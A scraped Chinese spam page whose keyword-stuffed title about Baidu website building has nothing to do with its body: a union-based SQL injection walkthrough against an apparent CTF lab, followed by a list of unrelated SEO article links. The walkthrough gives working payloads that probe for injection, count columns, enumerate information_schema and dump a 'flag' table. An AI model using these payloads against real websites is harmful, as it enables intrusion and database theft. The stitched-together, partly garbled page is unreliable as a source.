当前位置: 首页 > news >正文

百度做一个网站怎么做呢河南品牌网站建设

百度做一个网站怎么做呢,河南品牌网站建设,全国政府网站管理系统,上海 网站建判断存在 sqli 注入 1 1 and 11 1 and 12 因为 11 为真,12 为假,且 11 与 1 显示的数据一样,那么就存在 sqli 注入 查询该数据表的字段数量 一、 2 3 1,2成功带出数据,3没有数据,所以有两个字段 二、 1 order by …

判断存在 sqli 注入

1

1 and 1=1

 1 and 1=2

因为 1=1 为真,1=2 为假,且 1=1 与 1 显示的数据一样,那么就存在 sqli 注入

查询该数据表的字段数量

一、

2

3

 1,2成功带出数据,3没有数据,所以有两个字段

 二、

1 order by 2

1 order by 3

 1 order by 2 与 1 显示的一样,1 order by 3 没有数据,所以,字段数为 2

修改参数 ID 值

1 union select 1,2

由于 1 union select 1,2 只返回第一条结果,union select 的结果没有输出,所以需要修改参数 id

值,可以 -1 ,0 随便哪个都可以

 520 union select 1,2

 520 union select 1,version()

520 union select 1,database()  #查询当前数据库信息

查询所有的数据库库名(schemata 表 储存用户创建的 所有 数据库的库名schema_name 数据库库名

520 union select  1,group_concat(schema_name)

from information_schema.schemata

查询 sqli 数据库 下的  数据表(tables 表 储存用户创建的所有数据库的库名和表名,table_name数据库的表名

520 union select 1,group_concat(table_name)

from information_schema.tables

where table_schema='sqli'

查询sqli 数据库下,flag 表中的 字段名

columns 表 存储用户创建的所有数据库的库名table_schema、表名table_name、字段名column_name

0 union select 1,group_concat(column_name)

from information_schema.columns

where table_schema='sqli' and table_name='flag'

查询 sqli 数据库中.flag字段名下的 字段内容

520 union select 1,group_concat(flag)

from sqli.flag

http://www.ysxn.cn/news/1931.html

相关文章:

  • 做网站需要服务器还是主机武汉关键词seo排名
  • 做房产网站哪个好丽水网站seo
  • 可以做闪图的网站网站怎么优化推广
  • 关于动漫的网站建设百度seo优化工具
  • 长春火车站最新防疫要求百度 营销推广是做什么的
  • 八里庄街道网站建设洛阳seo网站
  • wordpress首页api幻灯片鄞州seo整站优化服务
  • 徐州企业做网站广州品牌营销服务
  • 静态网站怎么入侵临沂seo推广外包
  • 刘强东最开始在哪个平台做网站semi认证
  • 小网站如何做密码找回晚上国网app
  • 聊城网站制作关键词优化报价查询
  • 电商网站建设方案100例潍坊自动seo
  • 网站做开票视频运营管理平台
  • 做网站需要注册商标是几类做百度推广的网络公司广州
  • 射阳做网站5118关键词工具
  • 保定哪里有做网站的百度客服电话人工服务热线
  • 游戏网站如何做seo免费培训教程
  • 零食店网站构建策划报告网站推广怎么弄
  • flash 网站 模板发布软文平台
  • 学生自做网站优秀作品关键字搜索
  • wordpress 一栏seo课程排行榜
  • 网站制作怎么学怎样做网站平台
  • 爱搜索中级网站建设2021近期时事新闻热点事件
  • 鄂州网站建设哪家专业品牌推广运营策划方案
  • 房地产公司排名前十天津关键词优化平台
  • 网络工程就业岗位有哪些seo搜索引擎优化排名
  • 日本插画 网站百度产品优化排名软件
  • 扬州做网站的科技公司优化网络软件
  • 网站模版的优化360免费建站官网